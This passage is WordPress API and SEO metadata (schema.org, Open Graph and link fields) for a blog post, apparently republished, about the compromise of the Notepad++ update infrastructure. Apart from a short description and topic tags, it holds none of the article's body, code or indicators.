IoCs\",\"datePublished\":\"2026-02-03T09:04:28+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/\"},\"wordCount\":2792,\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072543\/notepad-supply-chain-attack-featured-image-990x400.jpg\",\"keywords\":[\"Cybersecurity\"],\"articleSection\":[\"CobaltStrike\",\"Cybersecurity\",\"DLL sideloading\",\"GReAT research\",\"Incidents\",\"Malware\",\"Malware descriptions\",\"Malware Technologies\",\"shellcode\",\"Supply-chain attack\",\"Windows malware\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/\",\"url\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/\",\"name\":\"The Notepad++ supply chain attack \u2014 unnoticed execution chains and new IoCs - Imperative Business Ventures Limited\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072543\/notepad-supply-chain-attack-featured-image-990x400.jpg\",\"datePublished\":\"2026-02-03T09:04:28+00:00\",\"author\":{\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"breadcrumb\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/#primaryimage\",\"url\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072543\/notepad-supply-chain-attack-featured-image-990x400.jpg\",\"contentUrl\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072543\/notepad-supply-chain-attack-featured-image-990x400.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/blog.ibvl.in\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"The Notepad++ supply chain attack \u2014 unnoticed execution chains and new IoCs\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.ibvl.in\/#website\",\"url\":\"https:\/\/blog.ibvl.in\/\",\"name\":\"Imperative Business Ventures Limited\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.ibvl.in\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/blog.ibvl.in\"],\"url\":\"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"The Notepad++ supply chain attack \u2014 unnoticed execution chains and new IoCs - Imperative Business Ventures Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/","og_locale":"en_US","og_type":"article","og_title":"The Notepad++ supply chain attack \u2014 unnoticed execution chains and new IoCs - Imperative Business Ventures Limited","og_description":"Introduction On February 2, 2026, the developers of Notepad++, a text editor popular among developers, published a statement claiming that the update infrastructure of Notepad++ has been compromised. According to the statement, this was due to a hosting provider level incident, which occurred from June to September 2025. However, attackers were able to retain access [&hellip;]","og_url":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/","og_site_name":"Imperative Business Ventures Limited","article_published_time":"2026-02-03T09:04:28+00:00","og_image":[{"url":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072543\/notepad-supply-chain-attack-featured-image-990x400.jpg","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"15 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/#article","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/"},"author":{"name":"admin","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"headline":"The Notepad++ supply chain attack \u2014 unnoticed execution chains and new IoCs","datePublished":"2026-02-03T09:04:28+00:00","mainEntityOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/"},"wordCount":2792,"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/#primaryimage"},"thumbnailUrl":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072543\/notepad-supply-chain-attack-featured-image-990x400.jpg","keywords":["Cybersecurity"],"articleSection":["CobaltStrike","Cybersecurity","DLL sideloading","GReAT research","Incidents","Malware","Malware descriptions","Malware Technologies","shellcode","Supply-chain attack","Windows malware"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/","url":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/","name":"The Notepad++ supply chain attack \u2014 unnoticed execution chains and new IoCs - Imperative Business Ventures Limited","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/#website"},"primaryImageOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/#primaryimage"},"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/#primaryimage"},"thumbnailUrl":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072543\/notepad-supply-chain-attack-featured-image-990x400.jpg","datePublished":"2026-02-03T09:04:28+00:00","author":{"@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"breadcrumb":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/#primaryimage","url":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072543\/notepad-supply-chain-attack-featured-image-990x400.jpg","contentUrl":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072543\/notepad-supply-chain-attack-featured-image-990x400.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/blog.ibvl.in\/"},{"@type":"ListItem","position":2,"name":"The Notepad++ supply chain attack \u2014 unnoticed execution chains and new IoCs"}]},{"@type":"WebSite","@id":"https:\/\/blog.ibvl.in\/#website","url":"https:\/\/blog.ibvl.in\/","name":"Imperative Business Ventures Limited","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.ibvl.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/blog.ibvl.in"],"url":"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/"}]}},"_links":{"self":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/1003","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/comments?post=1003"}],"version-history":[{"count":0,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/1003\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/media?parent=1003"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/categories?post=1003"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/tags?post=1003"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}